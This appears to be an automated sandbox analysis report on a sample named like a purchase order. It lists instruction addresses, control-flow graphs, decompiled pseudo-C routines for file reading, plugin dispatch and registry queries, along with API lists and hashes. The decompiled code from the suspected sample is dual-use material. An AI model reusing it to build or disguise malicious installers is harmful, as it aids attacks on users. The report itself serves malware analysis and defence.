                                                                                      0x0040726d
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407274
                                                                                      0x00407277
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x004072ae
                                                                                      0x004072ae
                                                                                      0x004072b1
                                                                                      0x004072b4
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00000000
                                                                                      0x00407328
                                                                                      0x004072b6
                                                                                      0x004072bc
                                                                                      0x004072bf
                                                                                      0x004072c2
                                                                                      0x004072c5
                                                                                      0x004072c8
                                                                                      0x004072cb
                                                                                      0x004072ce
                                                                                      0x004072d1
                                                                                      0x004072d4
                                                                                      0x004072d7
                                                                                      0x004072f0
                                                                                      0x004072f2
                                                                                      0x004072f5
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072fb
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407305
                                                                                      0x00407307
                                                                                      0x0040730a
                                                                                      0x0040730e
                                                                                      0x00407310
                                                                                      0x00407310
                                                                                      0x00407311
                                                                                      0x00407314
                                                                                      0x00407317
                                                                                      0x004072d9
                                                                                      0x004072d9
                                                                                      0x004072e1
                                                                                      0x004072e6
                                                                                      0x004072e8
                                                                                      0x004072eb
                                                                                      0x004072eb
                                                                                      0x0040731a
                                                                                      0x00407321
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00407321
                                                                                      0x00407234
                                                                                      0x00407237
                                                                                      0x00407239
                                                                                      0x0040723c
                                                                                      0x0040723f
                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407247
                                                                                      0x0040724a
                                                                                      0x0040724a
                                                                                      0x0040724d
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407257
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407257
                                                                                      0x004071dd
                                                                                      0x004071e0
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f44
                                                                                      0x00406f44
                                                                                      0x00406f48
                                                                                      0x0040758d
                                                                                      0x00000000
                                                                                      0x0040758d
                                                                                      0x00406f4e
                                                                                      0x00406f51
                                                                                      0x00406f54
                                                                                      0x00406f57
                                                                                      0x00406f5a
                                                                                      0x00406f5d
                                                                                      0x00406f60
                                                                                      0x00406f62
                                                                                      0x00406f65
                                                                                      0x00406f68
                                                                                      0x00406f6b
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070cf
                                                                                      0x004070cf
                                                                                      0x004070d3
                                                                                      0x00407599
                                                                                      0x00000000
                                                                                      0x00407599
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070df
                                                                                      0x004070e2
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e7
                                                                                      0x004070ea
                                                                                      0x004070ed
                                                                                      0x004070f0
                                                                                      0x004070f3
                                                                                      0x004070f6
                                                                                      0x004070f7
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070fc
                                                                                      0x004070ff
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407108
                                                                                      0x0040710a
                                                                                      0x0040710a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x00407350
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407356
                                                                                      0x00407359
                                                                                      0x0040735c
                                                                                      0x0040735f
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407364
                                                                                      0x00407367
                                                                                      0x0040736a
                                                                                      0x0040736d
                                                                                      0x00407370
                                                                                      0x00407373
                                                                                      0x00407374
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737c
                                                                                      0x0040737f
                                                                                      0x00407382
                                                                                      0x00407385
                                                                                      0x00407389
                                                                                      0x0040738b
                                                                                      0x0040738e
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x00000000
                                                                                      0x0040710d
                                                                                      0x0040738e
                                                                                      0x004075c3
                                                                                      0x004075e5
                                                                                      0x004075eb
                                                                                      0x004075ed
                                                                                      0x004075f4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x004075fa
                                                                                      0x004075fa
                                                                                      0x00000000

                                                                                      Strings
                                                                                      • pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_, xrefs: 00406BB0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_
                                                                                      • API String ID: 0-3612492708
                                                                                      • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                      • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                      • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                      • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 978 715d1817-715d1856 call 715d1bff 982 715d185c-715d1860 978->982 983 715d1976-715d1978 978->983 984 715d1869-715d1876 call 715d2480 982->984 985 715d1862-715d1868 call 715d243e 982->985 990 715d1878-715d187d 984->990 991 715d18a6-715d18ad 984->991 985->984 994 715d187f-715d1880 990->994 995 715d1898-715d189b 990->995 992 715d18cd-715d18d1 991->992 993 715d18af-715d18cb call 715d2655 call 715d1654 call 715d1312 GlobalFree 991->993 1000 715d191e-715d1924 call 715d2655 992->1000 1001 715d18d3-715d191c call 715d1666 call 715d2655 992->1001 1017 715d1925-715d1929 993->1017 998 715d1888-715d1889 call 715d2b98 994->998 999 715d1882-715d1883 994->999 995->991 996 715d189d-715d189e call 715d2e23 995->996 1009 715d18a3 996->1009 1012 715d188e 998->1012 1005 715d1885-715d1886 999->1005 1006 715d1890-715d1896 call 715d2810 999->1006 1000->1017 1001->1017 1005->991 1005->998 1016 715d18a5 1006->1016 1009->1016 1012->1009 1016->991 1021 715d192b-715d1939 call 715d2618 1017->1021 1022 715d1966-715d196d 1017->1022 1028 715d193b-715d193e 1021->1028 1029 715d1951-715d1958 1021->1029 1022->983 1024 715d196f-715d1970 GlobalFree 1022->1024 1024->983 1028->1029 1030 715d1940-715d1948 1028->1030 1029->1022 1031 715d195a-715d1965 call 715d15dd 1029->1031 1030->1029 1032 715d194a-715d194b FreeLibrary 1030->1032 1031->1022 1032->1029
                                                                                      C-Code - Quality: 88%
                                                                                      			E715D1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                      				void _v36;
                                                                                      				char _v136;
                                                                                      				struct HINSTANCE__* _t37;
                                                                                      				intOrPtr _t42;
                                                                                      				void* _t48;
                                                                                      				void* _t49;
                                                                                      				void* _t50;
                                                                                      				void* _t54;
                                                                                      				intOrPtr _t57;
                                                                                      				signed int _t61;
                                                                                      				signed int _t63;
                                                                                      				void* _t67;
                                                                                      				void* _t68;
                                                                                      				void* _t72;
                                                                                      				void* _t76;
                                                                                      
                                                                                      				_t76 = __esi;
                                                                                      				_t68 = __edi;
                                                                                      				_t67 = __edx;
                                                                                      				 *0x715d506c = _a8;
                                                                                      				 *0x715d5070 = _a16;
                                                                                      				 *0x715d5074 = _a12;
                                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x715d5048, E715D1651);
                                                                                      				_push(1); // executed
                                                                                      				_t37 = E715D1BFF(); // executed
                                                                                      				_t54 = _t37;
                                                                                      				if(_t54 == 0) {
                                                                                      					L28:
                                                                                      					return _t37;
                                                                                      				} else {
                                                                                      					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                      						E715D243E(_t54);
                                                                                      					}
                                                                                      					_push(_t54);
                                                                                      					E715D2480(_t67);
                                                                                      					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                      					if(_t57 == 0xffffffff) {
                                                                                      						L14:
                                                                                      						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                      							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                      								_push(_t54);
                                                                                      								_t37 = E715D2655();
                                                                                      							} else {
                                                                                      								_push(_t76);
                                                                                      								_push(_t68);
                                                                                      								_t61 = 8;
                                                                                      								_t13 = _t54 + 0x1018; // 0x1018
                                                                                      								memcpy( &_v36, _t13, _t61 << 2);
                                                                                      								_t42 = E715D1666(_t54,  &_v136);
                                                                                      								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                      								_t18 = _t54 + 0x1018; // 0x1018
                                                                                      								_t72 = _t18;
                                                                                      								_push(_t54);
                                                                                      								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                      								 *_t72 = 4;
                                                                                      								E715D2655();
                                                                                      								_t63 = 8;
                                                                                      								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                      							}
                                                                                      						} else {
                                                                                      							_push(_t54);
                                                                                      							E715D2655();
                                                                                      							_t37 = GlobalFree(E715D1312(E715D1654(_t54)));
                                                                                      						}
                                                                                      						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                      							_t37 = E715D2618(_t54);
                                                                                      							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                      								_t37 =  *(_t54 + 0x1008);
                                                                                      								if(_t37 != 0) {
                                                                                      									_t37 = FreeLibrary(_t37);
                                                                                      								}
                                                                                      							}
                                                                                      							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                      								_t37 = E715D15DD( *0x715d5068);
                                                                                      							}
                                                                                      						}
                                                                                      						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							return GlobalFree(_t54);
                                                                                      						}
                                                                                      					}
                                                                                      					_t48 =  *_t54;
                                                                                      					if(_t48 == 0) {
                                                                                      						if(_t57 != 1) {
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						E715D2E23(_t54);
                                                                                      						L12:
                                                                                      						_t54 = _t48;
                                                                                      						L13:
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					_t49 = _t48 - 1;
                                                                                      					if(_t49 == 0) {
                                                                                      						L8:
                                                                                      						_t48 = E715D2B98(_t57, _t54); // executed
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					_t50 = _t49 - 1;
                                                                                      					if(_t50 == 0) {
                                                                                      						E715D2810(_t54);
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					if(_t50 != 1) {
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					goto L8;
                                                                                      				}
                                                                                      			}


















                                                                                      0x715d1817
                                                                                      0x715d1817
                                                                                      0x715d1817
                                                                                      0x715d1824
                                                                                      0x715d182c
                                                                                      0x715d1839
                                                                                      0x715d1847
                                                                                      0x715d184a
                                                                                      0x715d184c
                                                                                      0x715d1851
                                                                                      0x715d1856
                                                                                      0x715d1978
                                                                                      0x715d1978
                                                                                      0x715d185c
                                                                                      0x715d1860
                                                                                      0x715d1863
                                                                                      0x715d1868
                                                                                      0x715d1869
                                                                                      0x715d186a
                                                                                      0x715d1870
                                                                                      0x715d1876
                                                                                      0x715d18a6
                                                                                      0x715d18ad
                                                                                      0x715d18d1
                                                                                      0x715d191e
                                                                                      0x715d191f
                                                                                      0x715d18d3
                                                                                      0x715d18d3
                                                                                      0x715d18d4
                                                                                      0x715d18dd
                                                                                      0x715d18de
                                                                                      0x715d18e8
                                                                                      0x715d18eb
                                                                                      0x715d18f0
                                                                                      0x715d18f7
                                                                                      0x715d18f7
                                                                                      0x715d18fd
                                                                                      0x715d18fe
                                                                                      0x715d1904
                                                                                      0x715d190a
                                                                                      0x715d1917
                                                                                      0x715d1918
                                                                                      0x715d191b
                                                                                      0x715d18af
                                                                                      0x715d18af
                                                                                      0x715d18b0
                                                                                      0x715d18c5
                                                                                      0x715d18c5
                                                                                      0x715d1929
                                                                                      0x715d192c
                                                                                      0x715d1939
                                                                                      0x715d1940
                                                                                      0x715d1948
                                                                                      0x715d194b
                                                                                      0x715d194b
                                                                                      0x715d1948
                                                                                      0x715d1958
                                                                                      0x715d1960
                                                                                      0x715d1965
                                                                                      0x715d1958
                                                                                      0x715d196d
                                                                                      0x00000000
                                                                                      0x715d196f
                                                                                      0x00000000
                                                                                      0x715d1970
                                                                                      0x715d196d
                                                                                      0x715d187a
                                                                                      0x715d187d
                                                                                      0x715d189b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d189e
                                                                                      0x715d18a3
                                                                                      0x715d18a3
                                                                                      0x715d18a5
                                                                                      0x00000000
                                                                                      0x715d18a5
                                                                                      0x715d187f
                                                                                      0x715d1880
                                                                                      0x715d1888
                                                                                      0x715d1889
                                                                                      0x00000000
                                                                                      0x715d1889
                                                                                      0x715d1882
                                                                                      0x715d1883
                                                                                      0x715d1891
                                                                                      0x00000000
                                                                                      0x715d1891
                                                                                      0x715d1886
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1886

                                                                                      APIs
                                                                                        • Part of subcall function 715D1BFF: GlobalFree.KERNEL32(?), ref: 715D1E74
                                                                                        • Part of subcall function 715D1BFF: GlobalFree.KERNEL32(?), ref: 715D1E79
                                                                                        • Part of subcall function 715D1BFF: GlobalFree.KERNEL32(?), ref: 715D1E7E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 715D18C5
                                                                                      • FreeLibrary.KERNEL32(?), ref: 715D194B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 715D1970
                                                                                        • Part of subcall function 715D243E: GlobalAlloc.KERNEL32(00000040,?), ref: 715D246F
                                                                                        • Part of subcall function 715D2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,715D1896,00000000), ref: 715D28E0
                                                                                        • Part of subcall function 715D1666: wsprintfW.USER32 ref: 715D1694
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3962662361-3916222277
                                                                                      • Opcode ID: 20b85a4984666d2a7f47299d9c09465995ffc815d5e46a2b867e21ac3a741317
                                                                                      • Instruction ID: 3f0298fbef22d7014c19a00bc09c21fcc8164e9ab8dbbdd879c1e4c0474d7cee
                                                                                      • Opcode Fuzzy Hash: 20b85a4984666d2a7f47299d9c09465995ffc815d5e46a2b867e21ac3a741317
                                                                                      • Instruction Fuzzy Hash: 8041A2729002469BEB0DDF7DD8C8B993BBCAF04354F14446AE9D7AE086DB74C088C760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1035 403479-4034a1 GetTickCount 1036 4035d1-4035d9 call 40302e 1035->1036 1037 4034a7-4034d2 call 4035f8 SetFilePointer 1035->1037 1042 4035db-4035df 1036->1042 1043 4034d7-4034e9 1037->1043 1044 4034eb 1043->1044 1045 4034ed-4034fb call 4035e2 1043->1045 1044->1045 1048 403501-40350d 1045->1048 1049 4035c3-4035c6 1045->1049 1050 403513-403519 1048->1050 1049->1042 1051 403544-403560 call 406bb0 1050->1051 1052 40351b-403521 1050->1052 1058 403562-40356a 1051->1058 1059 4035cc 1051->1059 1052->1051 1054 403523-403543 call 40302e 1052->1054 1054->1051 1061 40356c-403574 call 40620a 1058->1061 1062 40358d-403593 1058->1062 1060 4035ce-4035cf 1059->1060 1060->1042 1065 403579-40357b 1061->1065 1062->1059 1064 403595-403597 1062->1064 1064->1059 1066 403599-4035ac 1064->1066 1067 4035c8-4035ca 1065->1067 1068 40357d-403589 1065->1068 1066->1043 1069 4035b2-4035c1 SetFilePointer 1066->1069 1067->1060 1068->1050 1070 40358b 1068->1070 1069->1036 1070->1066
                                                                                      C-Code - Quality: 94%
                                                                                      			E00403479(intOrPtr _a4) {
                                                                                      				intOrPtr _t10;
                                                                                      				intOrPtr _t11;
                                                                                      				signed int _t12;
                                                                                      				void* _t14;
                                                                                      				void* _t15;
                                                                                      				long _t16;
                                                                                      				void* _t18;
                                                                                      				intOrPtr _t19;
                                                                                      				intOrPtr _t31;
                                                                                      				long _t32;
                                                                                      				intOrPtr _t34;
                                                                                      				intOrPtr _t36;
                                                                                      				void* _t37;
                                                                                      				intOrPtr _t49;
                                                                                      
                                                                                      				_t32 =  *0x420ef4; // 0x52096
                                                                                      				_t34 = _t32 -  *0x40ce60 + _a4;
                                                                                      				 *0x42a26c = GetTickCount() + 0x1f4;
                                                                                      				if(_t34 <= 0) {
                                                                                      					L22:
                                                                                      					E0040302E(1);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				E004035F8( *0x420f04);
                                                                                      				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                                                      				 *0x420f00 = _t34;
                                                                                      				 *0x420ef0 = 0;
                                                                                      				while(1) {
                                                                                      					_t10 =  *0x420ef8; // 0x5ab2d
                                                                                      					_t31 = 0x4000;
                                                                                      					_t11 = _t10 -  *0x420f04;
                                                                                      					if(_t11 <= 0x4000) {
                                                                                      						_t31 = _t11;
                                                                                      					}
                                                                                      					_t12 = E004035E2(0x414ef0, _t31);
                                                                                      					if(_t12 == 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *0x420f04 =  *0x420f04 + _t31;
                                                                                      					 *0x40ce80 = 0x414ef0;
                                                                                      					 *0x40ce84 = _t31;
                                                                                      					L6:
                                                                                      					L6:
                                                                                      					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                                                      						_t19 =  *0x420f00; // 0x19f0
                                                                                      						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                                                      						E0040302E(0);
                                                                                      					}
                                                                                      					 *0x40ce88 = 0x40cef0;
                                                                                      					 *0x40ce8c = 0x8000; // executed
                                                                                      					_t14 = E00406BB0(0x40ce68); // executed
                                                                                      					if(_t14 < 0) {
                                                                                      						goto L20;
                                                                                      					}
                                                                                      					_t36 =  *0x40ce88; // 0x410f70
                                                                                      					_t37 = _t36 - 0x40cef0;
                                                                                      					if(_t37 == 0) {
                                                                                      						__eflags =  *0x40ce84; // 0x0
                                                                                      						if(__eflags != 0) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _t31;
                                                                                      						if(_t31 == 0) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						L16:
                                                                                      						_t16 =  *0x420ef4; // 0x52096
                                                                                      						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                                                      							continue;
                                                                                      						}
                                                                                      						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                      						goto L22;
                                                                                      					}
                                                                                      					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                                                      					if(_t18 == 0) {
                                                                                      						_push(0xfffffffe);
                                                                                      						L21:
                                                                                      						_pop(_t15);
                                                                                      						return _t15;
                                                                                      					}
                                                                                      					 *0x40ce60 =  *0x40ce60 + _t37;
                                                                                      					_t49 =  *0x40ce84; // 0x0
                                                                                      					if(_t49 != 0) {
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					goto L16;
                                                                                      					L20:
                                                                                      					_push(0xfffffffd);
                                                                                      					goto L21;
                                                                                      				}
                                                                                      				return _t12 | 0xffffffff;
                                                                                      			}

















                                                                                      0x0040347c
                                                                                      0x00403489
                                                                                      0x0040349c
                                                                                      0x004034a1
                                                                                      0x004035d1
                                                                                      0x004035d3
                                                                                      0x00000000
                                                                                      0x004035d9
                                                                                      0x004034ad
                                                                                      0x004034c0
                                                                                      0x004034c6
                                                                                      0x004034cc
                                                                                      0x004034d7
                                                                                      0x004034d7
                                                                                      0x004034dc
                                                                                      0x004034e1
                                                                                      0x004034e9
                                                                                      0x004034eb
                                                                                      0x004034eb
                                                                                      0x004034f4
                                                                                      0x004034fb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403501
                                                                                      0x00403507
                                                                                      0x0040350d
                                                                                      0x00000000
                                                                                      0x00403513
                                                                                      0x00403519
                                                                                      0x00403523
                                                                                      0x00403539
                                                                                      0x0040353e
                                                                                      0x00403543
                                                                                      0x00403549
                                                                                      0x0040354f
                                                                                      0x00403559
                                                                                      0x00403560
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403562
                                                                                      0x00403568
                                                                                      0x0040356a
                                                                                      0x0040358d
                                                                                      0x00403593
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403595
                                                                                      0x00403597
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403599
                                                                                      0x00403599
                                                                                      0x004035ac
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004035bb
                                                                                      0x00000000
                                                                                      0x004035bb
                                                                                      0x00403574
                                                                                      0x0040357b
                                                                                      0x004035c8
                                                                                      0x004035ce
                                                                                      0x004035ce
                                                                                      0x00000000
                                                                                      0x004035ce
                                                                                      0x0040357d
                                                                                      0x00403583
                                                                                      0x00403589
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004035cc
                                                                                      0x004035cc
                                                                                      0x00000000
                                                                                      0x004035cc
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040348D
                                                                                        • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                      • SetFilePointer.KERNELBASE(00052096,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                      Strings
                                                                                      • pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_, xrefs: 004034D2, 0040356D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer$CountTick
                                                                                      • String ID: pha_3_code="PER"numeric_code="604"name="Peru"official_name="Republic of Peru" /><iso_3166_entryalpha_2_code="PH"alpha_3_code="PHL"numeric_code="608"name="Philippines"official_name="Republic of the Philippines" /><iso_3166_
                                                                                      • API String ID: 1092082344-3612492708
                                                                                      • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                      • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                      • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                      • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                      				int _v8;
                                                                                      				long _t21;
                                                                                      				long _t24;
                                                                                      				char* _t30;
                                                                                      
                                                                                      				asm("sbb eax, eax");
                                                                                      				_v8 = 0x800;
                                                                                      				_t5 =  &_a4; // 0x422728, executed
                                                                                      				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                      				_t30 = _a16;
                                                                                      				if(_t21 != 0) {
                                                                                      					L4:
                                                                                      					 *_t30 =  *_t30 & 0x00000000;
                                                                                      				} else {
                                                                                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                      					_t21 = RegCloseKey(_a20);
                                                                                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                      						goto L4;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t21;
                                                                                      			}







                                                                                      0x00406544
                                                                                      0x00406546
                                                                                      0x0040655b
                                                                                      0x0040655e
                                                                                      0x00406563
                                                                                      0x00406568
                                                                                      0x004065a6
                                                                                      0x004065a6
                                                                                      0x0040656a
                                                                                      0x0040657c
                                                                                      0x00406587
                                                                                      0x0040658d
                                                                                      0x00406598
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406598
                                                                                      0x004065ac

                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                                      • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422728), ref: 00406587
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
